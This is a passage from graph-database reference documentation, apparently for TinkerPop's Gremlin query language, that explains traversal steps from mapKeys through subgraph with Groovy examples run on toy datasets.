get their two most historic locations.\n\nThe two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in an object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.\n\nWARNING: The anonymous traversal of `local()` processes the current object \"locally.\" In OLAP, where the atomic unit of computing is the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[mapkeys-step]]\nMapKeys Step\n~~~~~~~~~~~~\n\nThe `mapKeys()`-step (*flatMap*) takes an incoming map and emits its keys. 
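\n\nFor example, a grouped count can be reduced to just its group keys; a minimal sketch over the modern toy graph (the `by(label)` grouping here is illustrative, not from the original examples):\n\n[gremlin-groovy,modern]\n----\ng.V().groupCount().by(label).mapKeys()\n----\n\n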
The step is especially useful when one is only interested in the top N elements in a `groupCount()` ranking.\n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5)\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5).mapKeys()\n----\n\n[[mapvalues-step]]\nMapValues Step\n~~~~~~~~~~~~~~\n\nThe `mapValues()`-step (*flatMap*) takes an incoming map and emits its values.\n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\n:set max-iteration 10\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").next() <1>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues() <2>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues().groupCount().\n order(local).by(valueDecr).limit(local, 5).next() <3>\n----\n\n<1> Which artist sang how many songs?\n<2> Get an anonymized set of song repertoire sizes.\n<3> What are the 5 most common song repertoire sizes?\n\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) provides a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of graph querying based on the notion of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. With `match()`, the user provides a collection of \"traversal fragments,\" called patterns, that have variables defined that must hold true throughout the duration of the `match()`. When a traverser is in `match()`, a registered `MatchAlgorithm` analyzes the current state of the traverser (i.e. its history based on its <<path-data-structure,path data>>), the runtime statistics of the traversal patterns, and returns a traversal-pattern that the traverser should try next. The default `MatchAlgorithm` provided is called `CountMatchAlgorithm` and it dynamically revises the pattern execution plan by sorting the patterns according to their filtering capabilities (i.e. largest set reduction patterns execute first). For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n \"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).\n select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below which demonstrates that standard inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).\n select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\n`MatchStep` brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. 
For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data\/` directory):\n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().match(\n __.as('a').has('name', 'Garcia'),\n __.as('a').in('writtenBy').as('b'),\n __.as('a').in('sungBy').as('b')).\n select('b').values('name')\n----\n\nAmong the features which differentiate `match()` from SPARQL are:\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name','lop').as('b'), <1>\n __.as('b').in('created').has('age', 29).as('c'),\n __.as('c').repeat(out()).times(2)). <2>\n select('c').out('knows').dedup().values('name') <3>\n----\n\n<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.\n<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.\n<3> *Imperative\/declarative hybrid*: Before and after a `match()`, it is possible to leverage classic Gremlin traversals.\n\nTo extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop')).\n select('b').out('created').\n match(\n __.as('x').in('created').as('y'),\n __.as('y').out('knows').as('z')).\n select('z').values('name')\n----\n\nIMPORTANT: The `match()`-step is stateless. The variable bindings of the traversal patterns are stored in the path history of the traverser. As such, the variables used over all `match()`-steps within a traversal are globally unique. A benefit of this is that subsequent `where()`, `select()`, `match()`, etc. steps can leverage the same variables in their analysis.\n\nLike all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop'),\n __.as('b').match(\n __.as('b').out('created').as('c'),\n __.as('c').has('name','ripple')).\n select('c').as('c')).\n select('a','c').by('name')\n----\n\nIf a step-labeled traversal precedes the `match()`-step and the traverser entering the `match()` is destined to bind to a particular variable, then the previous step should be labeled accordingly.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('knows').as('b').\n match(\n __.as('b').out('created').as('c'),\n __.not(__.as('c').in('created').as('a'))).\n select('a','b','c').by('name')\n----\n\nThere are three types of `match()` traversal patterns.\n\n . `as('a')...as('b')`: both the start and end of the traversal have a declared variable.\n . `as('a')...`: only the start of the traversal has a declared variable.\n . `...`: there are no declared variables.\n\nIf a variable is at the start of a traversal pattern it *must* exist as a label in the path history of the traverser, else the traverser can not go down that path. If a variable is at the end of a traversal pattern then if the variable exists in the path history of the traverser, the traverser's current location *must* match (i.e. equal) its historic location at that same label. 
However, if the variable does not exist in the path history of the traverser, then the current location is labeled as the variable and thus, becomes a bound variable for subsequent traversal patterns. If a traversal pattern does not have an end label, then the traverser must simply \"survive\" the pattern (i.e. not be filtered) to continue to the next pattern. If a traversal pattern does not have a start label, then the traverser can go down that path at any point, but will only go down that pattern once as a traversal pattern is executed once and only once for the history of the traverser. Typically, traversal patterns that do not have a start and end label are used in conjunction with `and()`, `or()`, and `where()`. Once the traverser has \"survived\" all the patterns (or at least one for `or()`), `match()`-step analyzes the traverser's path history and emits a `Map<String,Object>` of the variable bindings to the next step in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b'). <1>\n match( <2>\n __.as('a').out().count().as('c'), <3>\n __.not(__.as('a').in().as('b')), <4>\n or( <5>\n __.as('a').out('knows').as('b'),\n __.as('b').in().count().as('c').and().as('c').is(gt(2)))). <6>\n dedup('a','c'). <7>\n select('a','b','c').by('name').by('name').by() <8>\n----\n\n<1> A standard, step-labeled traversal can come prior to `match()`.\n<2> If the traverser's path prior to entering `match()` has requisite label values, then those historic values are bound.\n<3> It is possible to use <<a-note-on-barrier-steps,barrier steps>> though they are computed locally to the pattern (as one would expect).\n<4> It is possible to `not()` a pattern.\n<5> It is possible to nest `and()`- and `or()`-steps for conjunction matching.\n<6> Both infix and prefix conjunction notation is supported.\n<7> It is possible to \"distinct\" the specified label combination.\n<8> The bound values are of different types -- vertex (\"a\"), vertex (\"b\"), long (\"c\").\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()`-step allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).\n select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `P`-predicate (example above) or a `Traversal` (example below). Using `MatchPredicateStrategy`, `where()`-clauses are automatically folded into `match()` and thus, subject to the query optimizer within `match()`-step.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match(\n __.as('a').has(label,'person'), <1>\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). 
<2>\n select('a','c').by('name'); null <3>\ntraversal.toString() <4>\ntraversal <5> <6>\ntraversal.toString() <7>\n----\n\n<1> Any `has()`-step traversal patterns that start with the match-key are pulled out of `match()` to enable the vendor to leverage the filter for index lookups.\n<2> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<3> A useful trick to ensure that the traversal is not iterated by Gremlin Console.\n<4> The string representation of the traversal prior to its strategies being applied.\n<5> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<6> Both marko and josh are co-developers and marko knows josh.\n<7> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`)\n\nIMPORTANT: A `where()`-step is a filter and thus, variables within a `where()` clause are not globally bound to the path of the traverser in `match()`. As such, `where()`-steps in `match()` are used for filtering, not binding.\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yield a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. 
Though, with infix notation, only two traversals can be or'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().where(outE('created').or().outE('knows')).values('name')\n----\n\n[[order-step]]\nOrder Step\n~~~~~~~~~~\n\nWhen the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().by(decr)\ng.V().hasLabel('person').order().by('age', incr).values('name')\n----\n\nOne of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key\/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name')\ng.V().order().by('name',incr).values('name')\ng.V().order().by('name',decr).values('name')\n----\n\nThe `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', incr).values('name')\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', decr).values('name')\n----\n\nRandomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(shuffle)\ng.V().hasLabel('person').order().by(shuffle)\n----\n\nIMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.\n\n[[path-step]]\nPath Step\n~~~~~~~~~\n\nA traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).\n\nimage::path-step.png[width=650]\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().values('name')\ng.V().out().out().values('name').path()\n----\n\nIf edges are required in the path, then be sure to traverse those edges explicitly.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().inV().outE().inV().path()\n----\n\nIt is possible to post-process the elements of the path in a round-robin fashion via `by()`.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by('name').by('age')\n----\n\nFinally, because of `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if it's a person (as determined by having an `age`-property), then get all of their creations, else if it's a creation, get all the people that created it.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by(\n choose(hasLabel('person'),\n out('created').values('name'),\n __.in('created').values('name')).fold())\n----\n\nWARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. 
In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.\n\n[[path-data-structure]]\nPath Data Structure\n^^^^^^^^^^^^^^^^^^^\n\nThe `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.\n\nimage::path-data-structure.png[width=350]\n\n[gremlin-groovy,modern]\n----\npath = g.V(1).as('a').has('name').as('b').\n out('knows').out('created').as('c').\n has('name','ripple').values('name').as('d').\n identity().as('e').path().next()\npath.size()\npath.objects()\npath.labels()\npath.a\npath.b\npath.c\npath.d == path.e\n----\n\n[[profile-step]]\nProfile Step\n~~~~~~~~~~~~\n\nThe `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.\n\nWARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.\n\n[gremlin-groovy,modern]\n----\ng.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)\n----\n\nThe `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:\n\n* `Step`: A step within the traversal being profiled.\n* `Count`: The number of _represented_ traversers that passed through the step.\n* `Traversers`: The number of traversers that passed through the step.\n* `Time (ms)`: The total time the step was actively executing its behavior.\n* `% Dur`: The percentage of total time spent in the step.\n\nimage:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. Traversers can be merged and as such, when two traversers are \"the same\" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of \"represented\" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.\n\n[[range-step]]\nRange Step\n~~~~~~~~~~\n\nAs traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects continue to be iterated. When within the low (inclusive) and high (exclusive) range, traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0,3)\ng.V().range(1,3)\ng.V().repeat(both()).times(1000000).emit().range(6,10)\n----\n\nThe `range()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. For example, it is possible to produce a `Map<String, String>` for each traversed path, but containing only the second property value (the \"b\" step).\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').in().as('c').select('a','b','c').by('name').range(local,1,2)\n----\n\nThe next example uses the <<the-crew-toy-graph,The Crew>> toy data set. 
It produces a `List<String>` containing the second and third locations for each vertex.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').range(local, 1, 3)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do\/while looping. If `until()` comes before `repeat()` it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one-vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one-vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges there are no vertices to traverse. Given that `loops==2`, the until-predicate is satisfied and iteration halts. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and in such situations, the predicate is determined by `traversal.hasNext()`. 
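\n\nIn other words, the supplied traversal acts as a predicate over the current object: if it would emit at least one result, the predicate is true. A minimal sketch of the equivalence, restating such an `until()` with a (discouraged) lambda predicate:\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).values('name')\ng.V(1).repeat(out()).until {it.get().label() == 'software'}.values('name')\n----\n\n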
A few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>\ng.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>\ng.V(1).repeat(out()).until(outE().count().is(0)).path().by('name') <3>\n----\n\n<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.\n<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverse the outgoing edges.\n<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.\n\nWARNING: The anonymous traversals of `emit()` and `until()` (not `repeat()`) process their current objects \"locally.\" In OLAP, where the atomic unit of computing is the vertex and its local \"star graph,\" it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they can not traverse to an adjacent vertex's properties or edges.\n\n[[sack-step]]\nSack Step\n~~~~~~~~~\n\nimage:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a \"sack\". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?,mergeOperator?)`.\n\n* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.\n* *Split operator*: A `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.\n* *Merge operator*: A `BinaryOperator` that unites two traversers' sacks when they are merged. If no merge operator is provided, then traversers with sacks can not be merged.\n\nTwo trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().sack()\nrand = new Random()\ng.withSack {rand.nextFloat()}.V().sack()\n----\n\nA more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult).by('weight')`). Note that the <<by-step,`by()`>>-modulator can be any arbitrary traversal.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2)\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).sack()\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).path().\n by().by('weight')\n----\n\nimage:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). 
The second example demonstrates how `Map.clone()` ensures that each traverser's sack is a unique, local map.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as primitives are encoded in the memory address of the sack, not as a reference to an object.\n\nIf a *merge operator* is not provided, then traversers with sacks can not be bulked. However, in many situations, merging the sacks of two traversers at the same location is algorithmically sound and good to provide so as to gain the bulking optimization. In the examples below, the binary merge operator is `Operator.sum`. Thus, when two traversers merge, their respective sacks are added together.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()) <1>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).sack() <2>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows') <3>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows').sack() <4>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows').barrier().sack() <5>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows').barrier().sideEffect{it.setBulk(1)}.sack() <6>\n----\n\n<1> The knows-adjacent vertices of vertex 1 are vertices 2 and 4.\n<2> The `local(...barrier(normSack)...)` ensures that all traversers leaving vertex 1 have an evenly distributed amount of the initial 1.0 \"energy\" (50-50).\n<3> Going from vertices 2 and 4 yields two traversers at vertex 1.\n<4> Those two traversers each have a sack of 0.5.\n<5> The `barrier()` merges the two traversers at vertex 1 into a single traverser whose sack is 1.0.\n<6> There is now a single traverser with bulk of 2 and sack of 1.0 and thus, setting the bulk to 1 yields the expected 1.0.\n\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of traversers previously seen in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts at vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. 
The output is always a single path as by selecting a single edge, the traverser never splits and continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select('a','b','c')\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select('a','b').by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b').by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b'). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select('a','b').by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variables bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each binding vertex to their name property value and `where()` operates to ensure respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. 
A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are two results in the `store()` side-effect even though the interval selection is for one object. Realize that when the second object is on its way to the `range()` filter (i.e. `[0..1)`), it passes through `store()` and thus, is stored before being filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store('x').by('weight').cap('x')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the \"knows\" subgraph:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E() <2>\n----\n\n<1> As this function produces \"edge-induced\" subgraphs, `subgraph()` must be called at edge steps.\n<2> The subgraph contains only \"knows\" edges.\n\nA more common subgraphing use case is to get all of the graph structure surrounding a single 